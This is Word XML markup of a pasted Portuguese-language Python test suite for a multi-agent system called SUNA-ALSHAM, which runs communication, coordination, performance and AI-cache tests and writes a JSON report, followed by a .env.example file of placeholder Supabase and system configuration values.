      </w:r>
    </w:p>
    <w:p w14:paraId="5B2D21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result_hit = ai_cache.get("test_prompt", "gpt-3.5-turbo", 0.7)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D6B98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cache_hit_time = (time.time() - cache_hit_start) * 1000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53C62E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4EA5A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Obter estatísticas</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DA25C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cache_stats = ai_cache.get_stats()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38BAC8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0A576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16D0EF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88541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Verificar performance do cache</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B3A91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cache_working = result_miss is None and result_hit is not None</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70FF97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cache_fast = cache_hit_time &lt; cache_miss_time</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="186084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9CF43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2F57D7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57FB89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test_name="AI Cache Performance Test",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67DBD2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test_category="ai_evolution",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="773609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status="passed" if (cache_working and cache_fast) else "failed",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F14BF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09FB5D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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B37A1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"cache_miss_time_ms": cache_miss_time,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7037B0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"cache_hit_time_ms": cache_hit_time,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2367EA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"cache_stats": cache_stats,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="648B17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"cache_working": cache_working,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47077E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"cache_faster": cache_fast</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="058E45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3E1BA9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4632EE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AE873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Teste de cache IA: Hit {cache_hit_time:.2f}ms vs Miss {cache_miss_time:.2f}ms")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32A64A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076C6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57AEE4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duration_ms = (time.time() - start_time) * 1000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B8F76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 = TestResult(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79B3F3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test_id=test_id,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="079EFB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test_name="AI Cache Performance Test",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7935F4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test_category="ai_evolution",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25E7FE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status="error",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50282B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duration_ms=duration_ms,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="301CFD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details={},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="632864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error_message=str(e)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FA88B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)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FF46E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F4C5F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Teste de cache IA falhou: {e}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FF5E3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7232F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self.test_results.append(result)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BEFBB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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66EC8649" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1AE88FBD" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="66DF0A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MultiAgentTestSuite:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15AC06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"""Suite principal de testes"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="039534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E1210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66207C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self.network = MultiAgentNetwork()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0767B9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self.test_results: List[TestResult] = []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="314130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self.benchmark_results: List[BenchmarkResult] = []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D0027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9ECED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Inicializar testers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="117076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self.communication_tester = NetworkCommunicationTester(self.network)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="227E67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self.coordination_tester = CoordinationTester(self.network)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="665D83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self.performance_tester = PerformanceTester(self.network)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C9796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self.ai_evolution_tester = AIEvolutionTester(self.network)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E873C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52D97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run_all_tests(self) -&gt; Dict[str, Any]:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="310B67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"""Executa todos os testes"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D94B1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🧪</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Iniciando suite completa de testes...")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C725B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A2D02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Iniciar rede</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BD199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self.network.start()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2305A5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asyncio.sleep(2)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A9B1A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B5494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16D9FF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Testes de comunicação</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44356F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logger.info("</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>📡</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Executando testes de comunicação...")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="510ADE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comm_results = await self._run_communication_tests()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="290D52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F271A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Testes de coordenação</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A34E1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logger.info("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Executando testes de coordenação...")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79ACD4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coord_results = await self._run_coordination_tests()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7662F5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D7E4A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Testes de performance</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00F8BF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logger.info("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Executando testes de performance...")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61E90D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perf_results = await self._run_performance_tests()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44C4EA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15C0C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Testes de IA</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="536B41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logger.info("</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>🧠</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Executando testes de IA...")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54B880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ai_results = await self._run_ai_tests()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4520F3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C2B85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Compilar resultados</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CA937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all_results = comm_results + coord_results + perf_results + ai_results</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12B4B2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self.test_results.extend(all_results)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="393A27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70452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Gerar relatório</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BE2C7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report = self._generate_test_report()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="560876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DC5AC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Suite de testes conclu</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>í</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>da: {report['summary']['passed']}/{report['summary']['total']} testes passaram")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="437189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5B6E1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report</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03F21D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A733A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31A5C6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executando suite de testes: {e}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FAA55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raise</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="048BE1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finally:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="054879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self.network.stop()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="487158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F68F1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_run_communication_tests(self) -&gt; List[TestResult]:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38023E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"""Executa testes de comunicação"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="492F5F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results = []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="396586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6D905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results.append(await self.communication_tester.test_basic_communication())</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EBE60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results.append(await self.communication_tester.test_broadcast_communication())</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78825E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results.append(await self.communication_tester.test_message_priority_handling())</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C73AC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CA06A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results</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71246B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1D4C5E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_run_coordination_tests(self) -&gt; List[TestResult]:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15C2D5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"""Executa testes de coordenação"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E874E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results = []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57D59B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8ADF3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results.append(await self.coordination_tester.test_task_coordination())</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="046412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results.append(await self.coordination_tester.test_load_balancing())</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E2D5D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D5A6C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results</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10F380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8A550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_run_performance_tests(self) -&gt; List[TestResult]:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="291885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"""Executa testes de performance"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CC6B4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results = []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DFFD3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A5914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results.append(await self.performance_tester.test_throughput())</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="067248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results.append(await self.performance_tester.test_scalability())</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="695291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results.append(await self.performance_tester.test_resource_usage())</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FABD6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E62AD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results</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A9D63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12F31A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_run_ai_tests(self) -&gt; List[TestResult]:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="135445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"""Executa testes de IA"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22F399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results = []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7666E1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3D5FD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Só executar se OpenAI API key estiver disponível</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="237C68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os.getenv("OPENAI_API_KEY"):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76BA83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results.append(await self.ai_evolution_tester.test_ai_reflection())</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C4FE5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results.append(await self.ai_evolution_tester.test_ai_cache_performance())</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50130D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05F7B3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logger.warning("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OpenAI API key não encontrada, pulando testes de IA")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AB383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3CD84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results</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E58EB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456B2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_generate_test_report(self) -&gt; Dict[str, Any]:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D182E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"""Gera relatório completo dos testes"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43CE5E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total_tests = len(self.test_results)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EFBB6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passed_tests = len([r for r in self.test_results if r.status == "passed"])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7983DE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failed_tests = len([r for r in self.test_results if r.status == "failed"])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52FE7C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error_tests = len([r for r in self.test_results if r.status == "error"])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0801D9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A04EF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Agrupar por categoria</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A6CF7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categories = {}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="014CAB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result in self.test_results:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="756386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category = result.test_category</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06254D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category not in categories:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6014B5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categories[category] = {"passed": 0, "failed": 0, "error": 0, "total": 0}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="157796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7E30D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categories[category][result.status] += 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C906F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categories[category]["total"] += 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C1550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8BACF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Calcular métricas de performance</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71B9DE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durations = [r.duration_ms for r in self.test_results if r.duration_ms &gt; 0]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02977D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avg_duration = statistics.mean(durations) if durations else 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08A53A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5B11F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3707D3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"summary": {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4244AF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"total": total_tests,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="601B8E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"passed": passed_tests,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C3C36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"failed": failed_tests,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CF8D9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"error": error_tests,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01CAAC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"success_rate": (passed_tests / total_tests * 100) if total_tests &gt; 0 else 0,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57524E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"avg_duration_ms": avg_duration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B8D8A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},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FFCFC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"categories": categories,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3774AE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"detailed_results": [asdict(r) for r in self.test_results],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="125F70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"timestamp": datetime.now().isoformat(),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="726AFB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"network_info": {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D4E58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"total_agents": len(self.network.agents),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11A739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"active_agents": len([a for a in self.network.agents.values() if a.status == "running"])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="574BBF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FF363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74084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116CB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save_report(self, filename: str = "test_report.json"):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="728F92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"""Salva relatório em arquivo"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="090145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not self.test_results:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10DDDC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logger.warning("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Nenhum resultado de teste para salvar")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A60D6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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="601B12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99C3D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report = self._generate_test_report()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49EB39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FFE7B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40E6D1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with open(filename, 'w') as f:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="720017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json.dump(report, f, indent=2, default=str)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="089B40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71645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📄</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Relatório salvo em {filename}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C64AB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D0A2B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0A4640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salvando relat</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ó</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>rio: {e}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44310C28" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="28AC34E6" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="717611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async def main():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5981B3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"""Função principal para executar testes"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FD7AA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# Configurar logging</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FC32C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logging.basicConfig(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D9C09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level=logging.INFO,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="561D96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format='%(asctime)s - %(name)s - %(levelname)s - %(message)s'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="482A64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)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D5F8E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5F036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# Criar e executar suite de testes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B6B39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test_suite = MultiAgentTestSuite()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B7EBE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856BF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try:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42EC28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Executar todos os testes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78EC84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report = await test_suite.run_all_tests()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="249ECE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B6717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Salvar relatório</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D02EA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test_suite.save_report("multi_agent_test_report.json")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33F127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582EF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Imprimir resumo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B3AEA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print("\n" + "="*60)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E3D72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print("</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>🧪</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> RELATÓRIO FINAL DOS TESTES")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="066584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print("="*60)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F9191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print(f"Total de testes: {report['summary']['total']}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E7F55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print(f"Testes passaram: {report['summary']['passed']}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45EE51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print(f"Testes falharam: {report['summary']['failed']}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62B59E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print(f"Testes com erro: {report['summary']['error']}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C7D5D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print(f"Taxa de sucesso: {report['summary']['success_rate']:.1f}%")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2075C6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print(f"Duração média: {report['summary']['avg_duration_ms']:.2f}ms")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="613A29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print("="*60)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F58AC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7D091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Imprimir resultados por categoria</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="775BA3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category, stats in report['categories'].items():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1190FF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print(f"{category.upper()}: {stats['passed']}/{stats['total']} passaram")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02A2A9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53EE5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report</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48F828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33CCA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except Exception as e:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E266C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executando testes: {e}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2313F6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raise</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FE51E5D" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="23CAABA8" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="312805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__name__ == "__main__":</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="676DA5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# Executar testes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F0E1032" w14:textId="1C2A266E" w:rsid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asyncio.run(main())</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EAF452B" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="09A54BF4" w14:textId="608CABDB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.env.example</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="176FCDF2" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t># =====================================================</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="373C77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SUNA-ALSHAM - Variáveis de Ambiente</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25CD28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Sistema de Agentes Auto-Evolutivos com AutoML Real</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A8C0A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79898E0F" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2D1BC4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1D3F97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SUPABASE DATABASE CONFIGURATION</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BAAAD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4DCCFA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URL do seu projeto Supabase</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BAB60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SUPABASE_URL=https://seu-projeto-id.supabase.co</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08B113E0" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0C5434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Chave pública (anon key ) do Supabase</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1567ED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SUPABASE_KEY=sua-chave-publica-aqui</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F05AAAF" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2771CD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53EFE2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SUNA-ALSHAM SYSTEM CONFIGURATION</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34CC2E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181741FE" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4F4B60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Auto-inicialização do sistema (true/false)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19C5B7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SUNA_ALSHAM_AUTO_START=true</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51246FD7" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7DE37E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Intervalo entre ciclos de evolução (em minutos)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B89DC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SUNA_ALSHAM_EVOLUTION_INTERVAL=60</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12E50105" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7664DA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Modo debug (true/false)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16216D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SUNA_ALSHAM_DEBUG=false</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B6721DC" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5E8AB0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Versão do sistema</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09AA34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SUNA_ALSHAM_VERSION=2.1.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61A7FCD2" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="049AFC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48C635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CORE AGENT AUTOML CONFIGURATION</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="770FC6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332DAB5A" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7A1372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Habilitar Core Agent (true/false)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="571260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SUNA_ALSHAM_CORE_ENABLED=true</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76FEC766" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="273486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Percentual mínimo de melhoria esperado</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="250932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SUNA_ALSHAM_CORE_MIN_IMPROVEMENT=5.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CD94119" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="65A34E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Número de trials para otimização Optuna</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="450186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SUNA_ALSHAM_CORE_OPTUNA_TRIALS=30</w:t>
      </w:r>
    </w:p>
